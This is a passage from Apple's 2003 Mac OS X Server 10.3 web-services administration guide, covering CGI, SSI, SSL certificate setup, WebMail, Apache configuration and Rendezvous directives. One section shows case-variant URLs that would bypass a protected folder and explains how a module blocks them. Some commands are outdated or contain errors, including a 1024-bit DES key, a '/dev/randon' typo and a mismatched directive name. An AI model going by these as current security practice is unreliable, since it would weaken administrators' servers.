information.
WebDAV and Web Performance Cache Conflict
If you enable both WebDAV and the web performance cache on one or more virtual
hosts (sites), WebDAV clients may encounter problems if they try to upload multiple
files in the Finder—the upload may fail to complete.
To avoid this problem, disable the web performance cache for virtual hosts with
WebDAV enabled. See “Improving Performance of Static Websites (Performance Cache)”
on page 26 for more information about the performance cache.
LL2350.book Page 32 Friday, August 22, 2003 2:32 PM
Chapter 3 Managing Websites
33
Enabling a Common Gateway Interface (CGI) Script
Common Gateway Interface (CGI) scripts (or programs) send information back and
forth between your website and applications that provide different services for the site.
• If a CGI is to be used by only one site, install the CGI in the Documents folder for the
site. The CGI name must end with the suffix “.cgi.”
• If a CGI is to be used by all sites on the server, install it in the /Library/WebServer/CGI-
Executables folder. In this case, clients must include /cgi-bin/ in the URL for the site.
For example, http://www.example.com/cgi-bin/test-cgi.
• Make sure the file permissions on the CGI allow it to be executed by the user named
“www.” Since the CGI typically isn’t owned by www, the file should be executable by
everyone.
To enable a CGI for a website:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the Options pane, select CGI Execution.
5 Click Save.
Web service restarts.
Enabling Server Side Includes (SSI)
Enabling Server Side Includes (SSI) allows a chunk of HTML code or other information
to be shared by different webpages on your site. SSIs can also function like CGIs and
execute commands or scripts on the server.
Note: Enabling SSI requires making changes to UNIX configuration files in the Terminal
application. To enable SSI, you must be comfortable with typing UNIX commands and
using a UNIX text editor.
To enable SSI:
1 In the Terminal application, use the sudo command with a text editor to edit as the
super user (root):
2 Add the following line to each virtual host for which you want SSI enabled:
Options Includes
Each site is in a separate file in /etc/httpd/sites/.
To enable SSI for all virtual hosts, add the line outside any virtual host block.
3 In Server Admin for the server you want, click Settings in the button bar.
4 In the Sites pane, double-click one of the virtual host sites.
LL2350.book Page 33 Friday, August 22, 2003 2:32 PM
34
Chapter 3 Managing Websites
5 In the General pane, add index.shtml to the set of default index files for that site.
Repeat this procedure for each virtual host site that uses SSI. (See “Setting the Default
Page for a Website” on page 25 for more information.)
By default, the /etc/httpd/httpd.conf file maintained by Server Admin contains the
following two lines:
AddHandler server-parsed shtml
AddType text/html shtml
You can add MIME types in Server Admin from the MIME Types pane.
The changes take effect when you restart web service.
Viewing Website Settings
You can use the Sites pane of Server Admin to see a list of your websites. The Sites
pane shows:
• Whether a site is enabled
• The site’s DNS name and IP address
• The port being used for the site
Double-clicking a site in the Sites pane opens the site details window, where you can
view or change the settings for the site.
Setting Server Responses to MIME Types and
Content Handlers
Multipurpose Internet Mail Extension (MIME) is an Internet standard for specifying what
happens when a web browser requests a file with certain characteristics. Content
handlers are similar and also use suffixes to determine how a file is handled. A file’s
suffix describes the type of data in the file. Each suffix and its associated response
together is called a MIME type mapping or a content handler mapping. See
“Understanding Multipurpose Internet Mail Extension” on page 11 for more
information.
LL2350.book Page 34 Friday, August 22, 2003 2:32 PM
Chapter 3 Managing Websites
35
To set the server response for a MIME type or content handler:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the MIME Types or content Handlers pane, click the Add button, or select the item in
the list you want to edit and click the Edit button.
4 If necessary, type a name for a new MIME type or content handler, then type the file
suffix associated with this mapping in the Suffixes field.
If you use the suffix cgi, make sure you’ve enabled CGI execution for the website.
5 Click Save.
Web service restarts.
Enabling SSL
Before you can enable Secure Sockets Layer (SSL) protection for a website, you have to
obtain the proper certificates. For more information, see “Secure Sockets Layer (SSL)”
on page 45. When you have obtained a certificate, you can set up SSL for a site.
To set up SSL for a website:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the Security pane, select Enable Secure Sockets Layer.
5 Type a password in the Pass Phrase field.
6 Type the location of the SSL log file in the SSL Log File field.
You can also click the Browse button to locate the folder you want to use.
If you are administering a remote server, file service must be running on the remote
server to use the Browse button.
7 Type the location of the location of each certificate file in the appropriate field (if
necessary), or use the Browse button to choose the location.
8 Click the Edit button for the Certificate File, Key File, and CA File fields and paste the
contents of the appropriate certificate or key in the text field for each. Click OK each
time you paste text.
9 Click Save.
10 Click Stop Service, wait a moment, and then click Start Service.
LL2350.book Page 35 Friday, August 22, 2003 2:32 PM
36
Chapter 3 Managing Websites
Setting Up the SSL Log for a Website
If you are using Secure Sockets Layer (SSL) on your web server, you can set up a file to
log SSL transactions and errors.
To set up an SSL log:
1 In Server Admin, click Web for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site you want to edit.
4 In the Security pane, make sure Enable Secure Sockets Layer is checked, then enter the
pathname for the folder where you want to keep the SSL log in the SSL Log File field.
You can also use the Browse button to navigate to the folder.
5 Click Save.
Web service restarts.
Enabling PHP
PHP (PHP: Hypertext Preprocessor) is a scripting language embedded in HTML that is
used to create dynamic webpages. PHP provides functions similar to those of CGI
scripts, but supports a variety of database formats and can communicate across
networks via many different protocols. The PHP libraries are included in
Mac OS X Server, but are disabled by default.
See “Installing and Viewing Web Modules” on page 61 for more information on PHP.
To enable PHP:
1 In Server Admin, click Web for the server you want.
2 Click Settings in the button bar.
3 In the Modules pane, scroll to php4_module in the module list and click Enabled for
the module, if necessary.
4 Click Save.
Web service restarts.
User Content on Websites
Mac OS X client has a Personal Web Sharing feature, where a user may place content in
the Sites folder of his or her home directory and have it visible on the web. Mac OS X
Server has much broader web service capability, which can include a form of personal
web sharing, but there are important differences between Mac OS X client and
Mac OS X Server.
LL2350.book Page 36 Friday, August 22, 2003 2:32 PM
Chapter 3 Managing Websites
37
Web Service Configuration
By default, on Mac OS X Server:
• Web service ignores any files in the /etc/httpd/users/ folder.
• Workgroup Manager does not make any web service configuration changes.
• Folder listings are not enabled for users.
All folder listings in web service use Apache's FancyIndexing directive, which makes
folder listings more readable. In Server Admin, the Sites/Options pane for each site has
a Folder Listing checkbox. This setting enables folder listings for a specific virtual host
by adding a “+Indexes” flag to Apache's Options directive for that virtual host. If folder
listings are not explicitly enabled for each site (virtual host), file indexes are not shown.
The site-specific settings do not apply outside the site; therefore site-specific settings
do not apply to users' home directories. If you want users to have folder-indexing
capability on their home directories, you need to add suitable directives to Apache's
configuration files. For a specific user, you add the following directives inside the
<IfModule mod_userdir.c> block in the httpd.conf file:
<Directory "/Users/refuser/Sites">
Options Indexes MultiViews
AllowOverride None
Order allow,deny
Allow from all
</Directory>
Default Content
The default content for the user's Sites folder is an index.html file along with a few
images. It is important to note that this index.html file has text that describes the
Personal Web Sharing feature of Mac OS X client. The user should replace that
index.html file with one suited to the content of his or her Sites folder.
Accessing Web Content
Once the home directory is created, the content of the Sites folder within the user's
home directory is visible whenever web service is running. If your server is named
example.com and the user's short name is refuser, the content of the Sites folder can
be accessed at the URL http://example.com/~refuser.
If the user has multiple short names, any of those can also be used after the tilde to
access that same content.
If the user has placed a content file named foo.html in his or her Sites folder, that file
should be available at http://example.com/~refuser/foo.html.
LL2350.book Page 37 Friday, August 22, 2003 2:32 PM
38
Chapter 3 Managing Websites
If the user has placed multiple content files in his or her Sites folder, and cannot modify
the index.html to include links to those files, the user may benefit from the automatic
folder indexing described previously. If the “Enable folder listing” setting is enabled, an
index listing of file names will be visible to browsers at http://example.com/~refuser.
Indexing settings also apply to subfolders placed in the user's Sites folder. If the user
adds a content subfolder named Example to the Sites folder, and either an index.html
file is present inside the Example folder, or folder indexing is enabled for that user's site,
then the folder will be available to browsers at http://example.com/~refuser/Example.
The Module mod_hfs_apple Protects Web Content Against Case Insensitivity
in the HFS File System
Mac OS X Server 10.3 has a new feature that provides case-sensitive coverage for HFS
file names. This new feature should mean that the extra protection of mod_hfs_apple
(discussed below) is not necessary.
The HFS Extended volume format commonly used for Mac OS X Server preserves the
case of file names but does not distinguish between a file or folder named “Example”
and one named “eXaMpLe.” Were it not for mod_hfs_apple, this would be a potential
issue when your web content resides on such a volume and you are attempting to
restrict access to all or part of your web content using security realms. If you set up a
security realm requiring browsers to use a name and a password for read-only access to
content within a folder named “Protected,” browsers would need to authenticate in
order to access the following URLs:
http://example.com/Protected
http://example.com/Protected/secret
http://example.com/Protected/sECreT
But they could bypass it by using something like the following:
http://example.com/PrOtECted
http://example.com/PrOtECted/secret
http://example.com/PrOtECted/sECreT
Fortunately, mod_hfs_apple prevents those types of efforts to bypass the security
realm, and this module is enabled by default.
Note: mod_hfs_apple operates on folders; it is NOT intended to prevent access to
individual files. A file named “secret” can be accessed as “seCREt”. This is correct
behavior, and does not allow bypassing security realms.
LL2350.book Page 38 Friday, August 22, 2003 2:32 PM
Chapter 3 Managing Websites
39
Because of the warning message that appears in the web service error log about
mod_hfs_apple, there have been questions about the function of mod_hfs_apple. The
warning messages do not indicate a problem with the correct function of
mod_hfs_apple.
You can verify that mod_hfs_apple is operating correctly by creating a security realm
and attempting to bypass it with a case-variant of the actual URL. You will be denied
access and your attempt will be logged in the web service error log with messages
similar to the following:
[Wed Jul 31 10:29:16 2002] [error] [client 17.221.41.31] Mis-cased URI: /Library/WebServer/
Documents/PrOTecTED/secret, wants: /Library/WebServer/Documents/Protected/
LL2350.book Page 39 Friday, August 22, 2003 2:32 PM
LL2350.book Page 40 Friday, August 22, 2003 2:32 PM
4
41
4 WebMail
Enable WebMail for the websites on your server to
provide access to basic email operations by means of a
web connection.
WebMail adds basic email functions to your website. If your web service hosts more
than one website, WebMail can provide access to mail service on any or all of the sites.
The mail service looks the same on all sites.
WebMail Basics
The WebMail software is included in Mac OS X Server, but is disabled by default.
The WebMail software is based on SquirrelMail (version 1.4.1), which is a collection of
open-source scripts run by the Apache server. For more information on SquirrelMail,
see the website www.squirrelmail.org.
WebMail Users
If you enable WebMail, a web browser user can:
• Compose messages and send them
• Receive messages
• Forward or reply to received messages
• Maintain a signature that is automatically appended to each sent message
• Create, delete, and rename folders and move messages between folders
• Attach files to outgoing messages
• Retrieve attached files from incoming messages
• Manage a private address book
• Set WebMail Preferences, including the color scheme displayed in the web browser
To use your WebMail service, a user must have an account on your mail server.
Therefore, you must have a mail server set up if you want to offer WebMail on your
websites.
Users access your website’s WebMail page by appending /WebMail to the URL of your
site. For example, http://mysite.example.com/WebMail/.
LL2350.book Page 41 Friday, August 22, 2003 2:32 PM
42
Chapter 4 WebMail
Users log in to WebMail with the name and password they use for logging in to regular
mail service. WebMail does not provide its own authentication. For more information
on mail service users, see the mail service administration guide.
When users log in to WebMail, their passwords are sent over the Internet in clear text
(not encrypted) unless the website is configured to use SSL. For instructions on
configuring SSL, see “Enabling SSL” on page 35.
WebMail users can consult the user manual for SquirrelMail at www.squirrelmail.org/
wiki/UserManual.
WebMail and Your Mail Server
WebMail relies on your mail server to provide the actual mail service. WebMail merely
provides access to the mail service through a web browser. WebMail cannot provide
mail service independent of a mail server.
WebMail uses the mail service of your Mac OS X Server by default. You can designate a
different mail server if you are comfortable using the Terminal application and UNIX
command-line tools. For instructions, see “Configuring WebMail” on page 43.
WebMail Protocols
WebMail uses standard email protocols and requires your mail server to support them.
These protocols are:
• Internet Message Access Protocol (IMAP) for retrieving incoming mail
• Simple Mail Transfer Protocol (SMTP) for exchanging mail with other mail servers
(sending outgoing mail and receiving incoming mail)
WebMail does not support retrieving incoming mail via Post Office Protocol (POP). Even
if your mail server supports POP, WebMail does not.
Enabling WebMail
You can enable WebMail for the website (or sites) hosted by your web server. Changes
take effect when you restart web service.
To enable WebMail for a site:
1 Make sure your mail service is started and configured to provide IMAP and SMTP
service.
2 Make sure IMAP mail service is enabled in the user accounts of the users you want to
have WebMail access.
For details on mail settings in user accounts, see the user management guide.
3 In Server Admin, click Web in the list for the server you want.
4 Click Settings in the button bar.
LL2350.book Page 42 Friday, August 22, 2003 2:32 PM
Chapter 4 WebMail
43
5 In the Sites pane, double-click the site in the list.
6 In the Options pane, select WebMail.
7 Click Save.
Web service restarts.
Configuring WebMail
After enabling WebMail to provide basic email functions on your website, you can
change some settings to integrate WebMail with your site. You can do this by editing
the configuration file /etc/squirrelmail/config/config.php or by using the Terminal
application to run an interactive configuration script with root privileges. Either way,
you actually change the settings of SquirrelMail, which is open-source software that
provides WebMail service for the Apache web server of Mac OS X Server.
SquirrelMail, hence WebMail, has several options that you can configure to integrate
WebMail with your site. The options and their default settings are as follows:
• Organization Name is displayed on the main WebMail page when a user logs in. The
default is Mac OS X Server WebMail.
• Organization Logo specifies the relative or absolute path to an image file.
• Organization Title is displayed as the title of the web browser window while viewing
a WebMail page. The default is Mac OS X Server WebMail.
• Trash Folder is the name of the IMAP folder where mail service puts messages when
the user deletes them. The default is Deleted Messages.
• Sent Folder is the name of the IMAP folder where mail service puts messages after
sending them. The default is Sent Messages.
• Draft Folder is the name of the IMAP folder where mail service puts the user’s draft
messages. The default is Drafts.
You can configure these and other settings—such as which mail server provides mail
service for WebMail—by running an interactive Perl script in a Terminal window, with
root privileges. The script operates by reading original values from the config.php file
and writing new values back to config.php.
Important: If you use the interactive configuration script to change any SquirrelMail
settings, you must also use the script to enter your server’s domain name. If you fail to
do this, WebMail will be unable to send messages.
The WebMail configuration settings apply to all websites hosted by your web service.
LL2350.book Page 43 Friday, August 22, 2003 2:32 PM
44
Chapter 4 WebMail
To configure basic WebMail options:
1 In the Terminal application, type the following command and press Return:
sudo /etc/squirrelmail/config/conf.pl
2 Follow the instructions displayed in the Terminal window to change SquirrelMail
settings as desired.
3 Change the domain name to your server’s real domain name, such as example.com.
The domain name is the first item on the SquirrelMail script’s Server Settings menu.
The script operates by reading original values from config.php and writing new values
back to config.php.
If you don’t enter the server’s actual domain name correctly, the interactive script
replaces the original value, getenv(SERVER_NAME), with the same value but enclosed
in single quotes. The quoted value no longer works as a function call to retrieve the
domain name, and as a result WebMail can’t send messages.
WebMail configuration changes do not require restarting web service unless users are
logged in to WebMail.
To further customize the appearance (for example, to provide a specific appearance for
each of your websites), you need to know how to write PHP scripts. In addition, you
need to become familiar with the SquirrelMail plug-in architecture and write your own
SquirrelMail plug-ins.
LL2350.book Page 44 Friday, August 22, 2003 2:32 PM
5
45
5 Secure Sockets Layer (SSL)
Use Secure Sockets Layer to provide secure transactions
and encrypted communication to users of the websites
on your server.
If you want to provide secure transactions on your server, such as allowing users to
purchase items from a website, you should set up Secure Sockets Layer (SSL)
protection. SSL lets you send encrypted, authenticated information across the Internet.
If you want to allow credit card transactions through a website, for example, you can
protect the information that’s passed to and from that site.
Setting Up SSL
When you generate a certificate signing request (CSR), the certificate authority sends
you a certificate that you install on your server. They may also send you a CA certificate
(ca.crt). Installing this file is optional. Normally, CA certificates reside in client
applications such as Internet Explorer and allow those applications to verify that the
server certificate originated from the right authority. However, CA certificates expire or
evolve, so some client applications may not be up to date.
Generating a Certificate Signing Request (CSR) for Your Server
The CSR is a file that provides information needed to set up your server certificate.
To generate a CSR for your server:
1 Log in to your server using the root password and open the Terminal application.
2 At the prompt, type these commands and press Return at the end of each one:
cd
dd if=/dev/randon of=rand.dat bs=1m count=1
openssl genrsa -rand rand.dat -des 1024 > key.pem
3 At the next prompt, type a passphrase, then press Return.
The passphrase you create unlocks the server’s certificate key. You will use this
passphrase when you enable SSL on your web server.
LL2350.book Page 45 Friday, August 22, 2003 2:32 PM
46
Chapter 5 Secure Sockets Layer (SSL)
4 If it doesn’t already exist on your server, create a directory at the location /etc/httpd/
ssl.key.
Make a copy of the key.pem file (created in step 2) and rename it server.key. Then copy
server.key to the ssl.key directory.
5 At the prompt, type the following command and press Return:
openssl req -new -key key.pem -out csr.pem
This generates a file named csr.pem in your home directory.
6 When prompted, enter the following information:
• Country: The country in which your organization is located.
• State: The full name of your state.
• Locality: The city in which your organization is located.
• Organizational name: The organization to which your domain name is registered.
• Organizational unit: Usually something similar to a department name.
• Common name of your web server: The DNS name, such as server.apple.com.
• Email address: The email address to which you want the certificate sent.
The file csr.pem is generated from the information you provided.
7 At the prompt, type the following, then press Return:
cat csr.pem
The cat command lists the contents of the file you created in step 5 (csr.pem). You
should see the phrase “Begin Certificate Request” followed by a cryptic message. The
message ends with the phrase “End Certificate Request.” This is your certificate signing
request (CSR).
Obtaining a Website Certificate
You must purchase a certificate for each website from an issuing authority.
Keep these important points in mind when purchasing your certificate:
• You must provide an InterNIC-registered domain name that’s registered to your
organization.
• If you are prompted to choose a software vendor, choose Apache Freeware with
SSLeay.
• You have already generated a CSR, so when prompted, open your CSR file using a
text editor. Then copy and paste the contents of the CSR file into the appropriate text
field on the issuing authority’s website.
• You can have an SSL certificate for each IP address on your server. Because
certificates are expensive and must be renewed each year, you may want to purchase
a certificate for one host name and use the URL with host name followed by domain
name to avoid having to purchase multiple certificates. For example, if your domain
name is mywidgets.com, you could purchase a certificate for the host name “buy”
and your customers would connect to the URL https://buy.mywidgets.com.
LL2350.book Page 46 Friday, August 22, 2003 2:32 PM
Chapter 5 Secure Sockets Layer (SSL)
47
• The default certificate format for SSLeay/OpenSSL is PEM, which actually is Base64
encoded DER with header and footer line. For more about the certificate format, see
www.modssl.org.
After you’ve completed the process, you’ll receive an email message that contains a
Secure Server ID. This is your server certificate. When you receive the certificate, save it
to your web server’s hard disk as a file named server.crt.
Important: Be sure to make a copy of the certificate message or file.
Installing the Certificate on Your Server
You can use Server Admin or the command-line tool to specify the certificates for a site.
For instructions on using Server Admin for this purpose, see “Enabling SSL” on page 35.
To install an SSL certificate using the command-line tool in the Terminal
application:
1 Log in to your server as the administrator or super user (also known as root).
2 If it doesn’t already exist on your server, create a directory with this name:
/etc/httpd/ssl.crt
3 Copy server.crt (the file that contains your Secure Server ID) to the ssl.crt directory.
Enabling SSL for the Site
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site where you plan to use the certificate.
4 In the Security pane, select Enable Secure Socket Layer.
5 Type the password from your CSR in the Pass Phrase field.
6 Set the location of the log file that will record SSL transactions.
7 Click the Edit button and paste the text from your certificate file (the certificate you
obtained from the issuing authority) in the Certificate File field.
8 Click the Edit button and paste the text from your key file (the file key.pem, which you
set up earlier) in the Key File field.
9 Click the Edit button and paste the text from the ca.crt file in the CA File field. (This is
an optional file that you may have received from the certificate authority.)
10 Click Save.
11 Stop and then start web service.
LL2350.book Page 47 Friday, August 22, 2003 2:32 PM
48
Chapter 5 Secure Sockets Layer (SSL)
Web Server SSL Password Not Accepted When Manually Entered
Server Admin allows you to enable SSL with or without saving the SSL password. If you
did not save the passphrase with the SSL certificate data, the server prompts you for
the passphrase upon restart, but won't accept manually entered passphrases. Use the
Security pane for the site in Server Admin to save the passphrase with the SSL
certificate data.
LL2350.book Page 48 Friday, August 22, 2003 2:32 PM
6
49
6 Working With Open-Source
Applications
Become familiar with the open-source applications
Mac OS X Server uses to administer and deliver web
services.
Several open-source applications provide essential features of web service. These
applications include:
• Apache web server
• JBoss application server
• Tomcat servlet container
• MySQL database
Apache
Apache is the http web server provided with Mac OS X Server. You can use the Server
Admin application to manage most server operations, but in some instances you may
want to add or change parts of the open-source Apache server. In such situations, you
need to modify Apache configuration files and change or add modules.
LL2350.book Page 49 Friday, August 22, 2003 2:32 PM
50
Chapter 6 Working With Open-Source Applications
Location of Essential Apache Files
Apache configuration files and locations have been simplified in Mac OS X Server 10.3.
Locations of key files are as follows:
• The Apache configuration file for web service is located in the directory /etc/httpd/.
• The site configuration files are located in the directory /etc/httpd/sites.
• The Apache error log, which is very useful for diagnosing problems with the
configuration file, is located in the directory /var/log/httpd/ (with a symlink that
allows the directory to be viewed as /Library/Logs/WebServer/).
• Temporarily disabled virtual hosts are in the directory /etc/httpd/’sites_disabled/.
Note: All files in /etc/httpd/sites/ are read and processed by Apache when it does a
hard or soft (graceful) restart. Each time you save changes, the server does a graceful
restart. If you edit a file using a text editor that creates a temporary or backup copy,
the server restart may fail because two files with almost identical names are present.
To avoid this problem, delete temporary or backup files created by editing files in this
folder.
Editing Apache Configuration Files
You can edit Apache configuration files if you need to work with features of the Apache
web server that aren't included in Server Admin. To edit configuration files, you should
be an experienced Apache administrator and familiar with text-editing tools. Be sure to
make a copy of the original configuration file before editing it.
The configuration file httpd.conf handles all directives controlled by the Server Admin
application. You can edit this file, as long as you follow the conventions already in place
there (as well as the comments in that file). This file also has a directive to include the
sites/ directory. In that directory are all of the virtual hosts for that server. The files are
named with the unique identifier of the virtual host (for example,
10.201.42.7410_80_17.221.43.127_www.example.com.conf). You disable specific sites by
moving them to the sites_disabled directory and then restarting web service. You can
also edit site files as long as the conventions in the file are followed.
One hidden file in the sites_disabled folder is named “default_default.conf.” This file is
used as the template for all new virtual hosts created in Server Admin. An administrator
can edit the template file to customize it, taking care to follow the conventions already
established in the file.
For more information about Apache and its modules, see “Apache Modules” on
page 61.
LL2350.book Page 50 Friday, August 22, 2003 2:32 PM
Chapter 6 Working With Open-Source Applications
51
Starting and Stopping Web Service Using the apachectl
Script
The default way to start and stop Apache on Mac OS X Server is to use the web module
of Server Admin.
If you want to use the apachectl script to start and stop web service instead of using
Server Admin, be aware of the following behaviors:
• The web performance cache is enabled by default. When web service starts, both the
main web service process (httpd) and a webperfcache process start. (The
webperfcache process serves static content from a memory cache and relays
requests to httpd when necessary.) The apachectl script that comes with Mac OS X
Server is unaware of webperfcache. So if you have not disabled the performance
cache, you also need to use the webperfcachectl script to start and stop
webperfcache.
• The apachectl script does not increase the soft process limit beyond the default of
100. Server Admin raises this limit when it starts Apache. If your web server receives a
lot of traffic and relies on CGI scripts, web service may fail to run when it reaches the
soft process limit.
• The apachectl script does not start Apache automatically when the server restarts.
Understanding apachectl and the Web Service Soft Process Limit
When Apache is started using the apachectl script, the soft process limit is 100, the
default limit.
When you use CGI scripts, this limit may not be high enough. In this case, you can start
web service using Server Admin, which sets the soft process limit to 2048. Alternatively,
you can type “ulimit -u 2048” before using apachectl.
Enabling Apache Rendezvous Registration
Starting with version 10.2.4 of Mac OS X and Mac OS X Server, the preinstalled Apache
1.3 web service has the capability to register sites with Rendezvous. This feature, which
allows Rendezvous-enabled browsers such as Safari to find sites by name, is
implemented using a new Apache module, mod_rendezvous_apple. This module is
different from the mod_rendezvous available from a third party. (Apache Rendezvous is
not supported on the preinstalled Apache 2 web service.)
The module mod-rendezvous_apple allows administrators to control how websites are
registered with Rendezvous. Mod_rendezvous_apple is disabled by default on
Mac OS X Server.
LL2350.book Page 51 Friday, August 22, 2003 2:32 PM
52
Chapter 6 Working With Open-Source Applications
To enable mod_rendezvous_apple on Mac OS X Server:
m To enable the module, use the Modules pane in Server Admin.
To set up mod_rendezvous_apple on Mac OS X Server:
m To cause additional logging, which may be helpful if you discover a problem, find the
LogLevel directive in httpd.conf and change it to a more verbose setting, such as “info.”
Note: Whenever new users are added, restart web service so that their sites are
registered.
As always, follow the guidelines Apple has added as comments in configuration files.
They explain safe procedures for modifying those files.
Note that a user's home directory, which would include a Sites folder, might not be
present if the administrator added the user without creating a home directory for that
person. There are several ways to create a home directory, such as adding the home
directory in the Workgroup Manager application or using the command-line
createhomedir too to create the directory.
Here is a full description of the Apache configuration directives supported by
mod_rendezvous_apple.
RegisterDefaultSite directive
• Syntax: RegisterMachine [port | main]
• Default: No registration if directive is absent. Port defaults to 80.
• Context: server config
• Compatibility: Apache 1.3.x; Mac OS X and Mac OS X Server only
• Module: mod_rendezvous_apple
This directive controls how the computer name is registered on the default site with
Rendezvous.
The RegisterDefaultSite directive causes the registration of the default website under
the computer name, as specified in the Sharing pane of System Preferences. A port
number can be specified, or the keyword “main”; in the latter case, the port number of
the “main server” (outside any virtual hosts) is used. On Mac OS X Server, do not specify
“main,” because all externally visible sites are virtual hosts, and the main server is used
only for status. If the argument is omitted, port 80 is used.
If the directive is absent, the computer name is not registered.
Rendezvous details: This directive results in a call to the registration function, with an
empty string as the name (causing Rendezvous to use the computer name), with
“_http._tcp” as the service type (indicating a web server), and with an empty string as
the TXT parameter (indicating the default website).
LL2350.book Page 52 Friday, August 22, 2003 2:32 PM
Chapter 6 Working With Open-Source Applications
53
RegisterUserSite directive
• Syntax: RegisterUserSite username | all-users | customized users [
registrationNameFormat [port | main]
• Default: No registration if directive is absent; registration name defaults to
longname. Port defaults to 80, host defaults to local.
• Context: server config
• Compatibility: Apache 1.3.x; Mac OS X and Mac OS X Server only
• Module: mod_rendezvous_apple
This RegisterUserSite directive causes the registration of the specified users’ default
website.
The required first argument is either an individual user's name or the keyword “all-
users” or “customized-users.” The “all-users” keyword causes all users in the hosts’
directory to be considered for registration. Registration takes place if the user is a non-
system user (user ID > 100), with an enabled website directory as specified in the
UserDir directive, and only if that directory is accessible by the local host. Note that this
may require a mount if the user's home directory is remote; if the home directory is not
available, the user site is not registered. The “customized-users” keyword limits
registration to those users who have an index.html file in their website directory that
differs from the index.html file in the standard user template. In other words, it makes a
reasonable attempt to limit registration to users who have customized their websites.
The optional second argument determines the form of the name under which the user
site is registered. This takes the form of a format string, similar to the LogFormat
directive. Certain directives in the format string are replaced with values:
%l - user’s longname, such as Joe User
%n - user’s short name, such as juser
%u - user’s userid, such as 1234
%t - HTML title of user’s index file (as determined by DirectoryIndex directive; by
default it is index.html) from the user’s default site folder (as determined by the
UserDir directive; by default it is Sites). For Mac OS X Personal Web Sharing, the
default title in a non-customized webpage is “Mac OS X Personal Web Sharing.”
%c - computer name, as set in Sharing Preference panel
The default is %l, the longname. The second argument must be specified if the optional
third argument is desired.
LL2350.book Page 53 Friday, August 22, 2003 2:32 PM
54
Chapter 6 Working With Open-Source Applications
The optional third argument can be can be used to specify a port number under which
the HTTP service is to be registered, or the keyword “main”; in the latter case, the port
number of the “main server” (outside any virtual hosts) is used. In the case of Mac OS X
Server, do not specify “main” for the port, because all externally visible sites are virtual
hosts, and the main server is used only for status. If the port argument is omitted, port
80 is used.
If the directive is absent, no user site registration takes place. This directive is not
processed if mod_userdir is not loaded. The UserDir and DirectoryIndex directives must
precede the RegisterUserSite directive in the Apache config file.
Rendezvous details: This directive results in a call to the registration function, with a
string like “Joe User” as the name, with “_http_tcp” as the service type (indicating a web
server), and with a value like “path=/~juser/” as the TXT parameter (which, after
expansion by mod_userdir, indicates the user’s default website), and with the
appropriate port.
RegisterResource directive
• Syntax: RegisterResource name path [port | main]
• Default: No registration if directive is absent. Port defaults to 80.
• Context: server config
• Compatibility: Apache 1.3.x; Mac OS X and Mac OS X Server only
• Module: mod_rendezvous_apple
The RegisterResource directive causes the registration of the specified resource path
under the specified name.
The optional third argument can be used to specify a port number, or the keyword
“main”; in the latter case, the port number of the “main server” (outside any virtual
hosts) is used. On Mac OS X Server, do not specify “main,” because all externally visible
sites are virtual hosts, and the main server is used only for status. If the third argument
is omitted, port 80 is used.
Rendezvous details: This directive results in a call to the registration function, with the
specified name, with “_http._tcp” as the service type (indicating a web server), with
“path=/specifiedpath” as the TXT parameter, and with the appropriate port.
LL2350.book Page 54 Friday, August 22, 2003 2:32 PM
Chapter 6 Working With Open-Source Applications
55
Using Apache Axis
You can use Apache Axis by writing web applications that use the Axis libraries and
then deploy the applications in Tomcat or JBoss. Unlike JBoss and Tomcat, Axis is not
usually used as an application server.
Mac OS X Server version 10.3 includes a preinstalled version of Apache Axis (1.1), which
operates in conjunction with the preinstalled Tomcat 4.1.24-LE. Apache Axis is an
implementation of Simple Object Access Protocol (SOAP). More about SOAP can be
found at http://www.w3.org/TR/SOAP/. More about Axis can be found at
http://ws.apache.org/axis/.
The Axis libraries can be found in /System/Library/Axis. By default, Apple installs a
sample Axis web application into Tomcat. The web application known as axis can be
found in /Library/Tomcat/webapps/axis.
After you enable Tomcat using the Application Server section of Server Admin, you can
validate the preinstalled Apache Axis by browsing the following:
http://example.com:9006/axis/
Replace “example.com” in the URL above with your host name. Note the nonstandard
Tomcat port.
The first time you exercise the preinstalled Axis by browsing http://example.com:9006/
axis/ and selecting the link entitled “Validate the local installation's configuration,” you
should expect to see the following error messages:
• Warning: could not find class javax.mail.internet.MimeMessage from file mail.jar
Attachments will not work.
See http://java.sun.com/products/javamail/
• Warning: could not find class org.apache.xml.security.Init from file xmlsec.jar
XML Security is not supported
See http://xml.apache.org/security/
Follow the instructions that accompany the warning messages if you require those
optional components.
Consult the Axis User's Guide on the Apache Axis website to learn more about using
Axis in your own web applications.
Experimenting With Apache 2
Version 10.3 of Mac OS X Server includes Apache 2 for evaluation purposes in addition
to the operational version of Apache 1.3. By default, Apache 2 is disabled, and all Server
Admin operations work correctly with Apache 1.
LL2350.book Page 55 Friday, August 22, 2003 2:32 PM
56
Chapter 6 Working With Open-Source Applications
If you want to experiment with Apache 2, note the following:
• It is installed in a separate location in the file system: /opt/apache2.
• It is not connected to Server Admin.
• It serves webpages from /opt/apache2/htdocs.
• Its configuration is in /opt/apache2/conf/httpd.conf. Apple modified this file by
configuring it to run the httpd processes as user and group www. If you enable
WebDAV with Apache 2, note that although your WebDAV clients using version 10.1
of Mac OS X or Mac OS X Server will be able to mount Apache2 WebDAV volumes,
they will not have write access; they will have read-only access. WebDAV clients using
version 10.2 will not have this problem.
• It is controlled by its own version of the apachectl script, so to start it, type “sudo /
opt/apache2/bin/apachectl start.”
• Although it's possible to run both versions of Apache, you should be cautious when
doing so. Make sure the two versions do not attempt to listen on the same port. Both
are configured to listen on port 80, so either edit /opt/apache2/conf/httpd.conf to
change the Listen directive or use the web section of Server Admin to change the
port of all your virtual hosts to something other than 80. Also note that if the web
performance cache is enabled, it may be the process that's actually listening on
port 80.
JBoss
JBoss is an open-source application server designed for J2EE applications; it runs on
Java 1.4.1. JBoss is a widely used, full-featured Java application server. It provides a full
Java 2Platform, Enterprise Edition (J2EE) technology stack with features such as:
• An Enterprise Java Bean (EJB) container
• Java Management Extensions (JMX)
• Java Connector Architecture (JCA)
By default, JBoss uses Tomcat as its web container, but you can use other web
containers, such as Jetty, if you wish.
You can use the Application Server section of Server Admin and the command-line
tools in the Terminal application to manage JBoss. Server Admin integrates with the
